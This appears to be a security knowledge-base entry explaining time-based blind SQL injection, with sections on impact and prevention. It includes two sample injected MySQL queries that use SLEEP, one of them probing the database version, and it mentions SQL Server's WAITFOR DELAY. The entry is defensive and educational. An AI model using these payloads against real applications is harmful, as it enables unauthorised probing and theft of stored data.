Time based Blind SQL Injection (SQLi)

OWASP 2013-A1 OWASP 2017-A1 OWASP PC-C3 PCI v3.2- CAPEC-88 CWE-78 HIPAA-78 ISO27001-A.14.2.5 WASC-31 WSTG-INPV-05

Time-based SQL injection is a type of inferential injection or blind injection attack. Inferential injection attack is a type of attack in which no data is transferred between the attacker and the database and the attacker won’t be able to get results as easily as in an in-band injection attack. This is why it is also called a blind injection attack. An attacker can reconstruct and make a new database structure inside the database.

In a time-based attack, an attacker sends an SQL command to the server with code to force a delay in the execution of the queries.

The response time indicates whether the result of the query is true or false. Depending on the response, the attacker will execute another query. Because the attacker has to enumerate each character by character, this is usually a slow intrusion technique, especially for large databases.

For example, in MySQL, the function SLEEP can be used, this function is only available since MySQL 5.

        /* Resulting query (with malicious SLEEP injected). */
        SELECT * FROM table  WHERE id=1-SLEEP(15)


    

When an attacker tries to use these functions in the query and if he is successful in slowing the response, it proves SQL injection is possible and the server is using MySQL as a database. This can lead the attacker to inject a more complex payload.

        /*Resulting query - Time-based attack to verify database version. */
        SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1) = '5', SLEEP(15), 0)


    

Likewise in SQL Server, the functions WAIT FOR DELAY can be used to suspend the execution for the specified amount of time or WAIT FOR TIME can be used to suspend the execution of the query and continue it when system time is equal to the parameter.

Impact of Time-Based Blind SQL Injection

SQL injection can leave the application at a high-risk, resulting in an impact on confidentiality, and integrity of data. Also, it can affect the authentication and authorization aspects of the application.

An attacker can compromise a vulnerable application and steal sensitive information stored in databases such as user credentials, payment details, or credit card details.

How to Prevent Time-Based Blind SQL Injection

There are various efficient ways to patch SQL injection attacks from taking place, as well as defending against them. Data that comes from a third-party reference, like user input, should not be trusted and it should be assumed to be malicious in nature.

We can mitigate SQL injection using the following techniques:

  • Use of prepared statements (with parameterized queries)

  • Use of stored procedures

  • Whitelist input validation

  • Escaping all user-supplied input

  • Enforcing the least privilege

Latest Articles